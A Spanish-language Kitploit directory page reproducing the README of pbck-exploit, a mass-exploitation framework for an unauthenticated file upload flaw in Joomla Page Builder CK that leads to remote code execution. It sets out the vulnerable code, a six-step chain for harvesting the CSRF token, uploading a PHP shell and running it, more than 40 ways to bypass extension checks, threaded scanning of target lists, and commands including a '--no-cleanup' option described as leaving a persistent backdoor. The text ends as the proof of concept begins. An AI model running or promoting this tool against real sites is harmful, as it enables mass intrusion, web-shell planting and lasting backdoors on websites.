Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
pbck-exploit — 📤 Framework de explotación masiva para CVE-2026-56290 — Page Builder CK Joomla: carga de archivos no autenticada que conduce a RCE (ejecución remota de código). | Kitploit
Herramientas/GitHubGitHub/shinthink/pbck-exploit
ReconocimientoEscáneres de VulnerabilidadesFrameworks de ExploitsExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubshinthink/pbck-exploit

pbck-exploit

📤 Framework de explotación masiva para CVE-2026-56290 — Page Builder CK Joomla: carga de archivos no autenticada que conduce a RCE (ejecución remota de código).

Ver Repositorio
314hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PBCK-Exploit — Exploit de CVE-2026-56290 para Joomla Page Builder CK

Python CVE License

Discovery CSRF RCE Cleanup Live

Framework de explotación masiva y validación para Joomla Page Builder CK

Subida arbitraria de archivos sin autenticación → Ejecución remota de código



📑 Tabla de contenidos

  • Resumen de la vulnerabilidad
  • Versiones afectadas
  • Características
  • Instalación
  • Uso
  • Prueba de concepto
  • Análisis técnico en profundidad
  • Metodología de detección
  • Defensa y mitigación
  • Descargo de responsabilidad
  • Referencias

🔴 Resumen de la vulnerabilidad

CVE-2026-56290 es una vulnerabilidad de severidad crítica en Page Builder CK (com_pagebuilderck), una popular extensión de creación de páginas para Joomla. El método browse.ajaxAddPicture del controlador acepta subidas de archivos sin autenticación con una ruta de destino controlada por el usuario, lo que permite a los atacantes escribir archivos PHP arbitrarios en directorios accesibles desde la web.

La causa raíz

// browse.php controller — NO authentication check
function ajaxAddPicture() {
    $input = JFactory::getApplication()->input;
    $file  = $input->files->get('file', null);   // ← user-controlled file
    $path  = trim($input->get('path', ''));       // ← user-controlled path, only trim()!
    // ... uploads file to $path without validating the destination
}

El parámetro path solo pasa por una sanitización con trim() — sin lista blanca, sin comprobación de traversal de directorios, sin barrera de autenticación. Combinado con un token CSRF que es accesible públicamente desde cualquier página de Joomla, los atacantes pueden subir shells PHP de forma remota a cualquier directorio escribible.

Impacto

Vector de ataqueSeveridadImpacto
Subida de archivos sin autenticación9.8 (Crítica)Ejecución arbitraria de código PHP
Recolección de tokens CSRF5.3 (Media)Habilita la cadena de subida
Divulgación de información5.3 (Media)Fingerprinting de la versión de la extensión

La cadena de ataque

1. HIT Joomla homepage     →  harvest CSRF token (hex32 + value "1")
2. POST file upload         →  task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in       →  media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL            →  code executes, RCE confirmed
5. POST f=@file to shell    →  upload additional tools
6. GET ?cleanup=1           →  shell self-destructs

🟠 Versiones afectadas

Versión de Page Builder CKEstadoNotas
3.1.1 y anteriores🔴 VulnerableSubida sin autenticación confirmada
3.4.10 y anteriores🔴 VulnerableRango ampliado según el análisis
3.5.10 y anteriores🔴 VulnerablePueden existir variantes parcheadas
> 3.5.10🟢 Posiblemente parcheadoVerificar mediante el XML del manifiesto

Nota: La versión se detecta a partir del archivo de manifiesto de Joomla en /administrator/manifests/files/com_pagebuilderck.xml. Si el manifiesto no es accesible, el escáner trata el objetivo como potencialmente vulnerable por defecto.


✨ Características

🔍 Reconocimiento

  • Detección de Joomla — En 2 fases: huellas HTML + prueba del panel de administración
  • Detección de PBCK — Pruebas directas de rutas + coincidencia de patrones HTML
  • Extracción de versión — Análisis del XML del manifiesto + respaldo con regex HTML
  • Recolección de tokens CSRF — Extracción de tokens en múltiples páginas (inicio, login, registro, administración)
  • Fuerza bruta de endpoints — Más de 1000 combinaciones de tarea/parámetro/ruta con un presupuesto de tiempo para el descubrimiento

💀 Explotación

  • Bypass de más de 40 extensiones — Variación de mayúsculas, variantes numeradas, dobles extensiones, trucos de Windows
  • Más de 20 rutas de destino — Directorios de extensiones, directorios escribibles de Joomla, rutas de traversal
  • Validación del shell — Confirmación basada en token de que PHP se ejecuta
  • Limpieza automática — Los shells se autodestruyen tras la validación (?cleanup=1)
  • Salida TXT en vivo — Resultados en tiempo real y seguros para hilos, escritos en un archivo
  • Informe JSON — Informe estructurado con detalles completos por objetivo

📦 Instalación

# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit

# Install dependencies
pip install -r requirements.txt

# Verify
python cve_2026_56290.py --help

Requisitos

requests>=2.28.0
urllib3>=1.26.0

📖 Uso

Argumentos de línea de comandos

CVE-2026-56290 — PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator

  -t, --target        Single target URL
  -f, --file          File with target URLs (one per line, # for comments)
  -o, --output        Live TXT output file (default: cve-2026-56290_live.txt)
  --json              JSON report file path (default: cve-2026-56290_report.json)
  --threads           Concurrent workers (default: 20)
  --timeout           Request timeout in seconds (default: 15)
  --no-cleanup        Leave shells on target (persistent backdoor)
  -v, --verbose       Verbose endpoint discovery output
  --known-endpoint    Skip discovery: task,file_param,folder_param

Uso básico

# Single target
python cve_2026_56290.py -t https://target.com

# Mass scan from file
python cve_2026_56290.py -f targets.txt

# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v

# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup

# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"

Formato del archivo de objetivos

# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored

🧪 Prueba de concepto

Escenario 1: Escaneo masivo con salida en vivo

$ python cve_2026_56290.py -f targets.txt -o live_results.txt
Descargar herramienta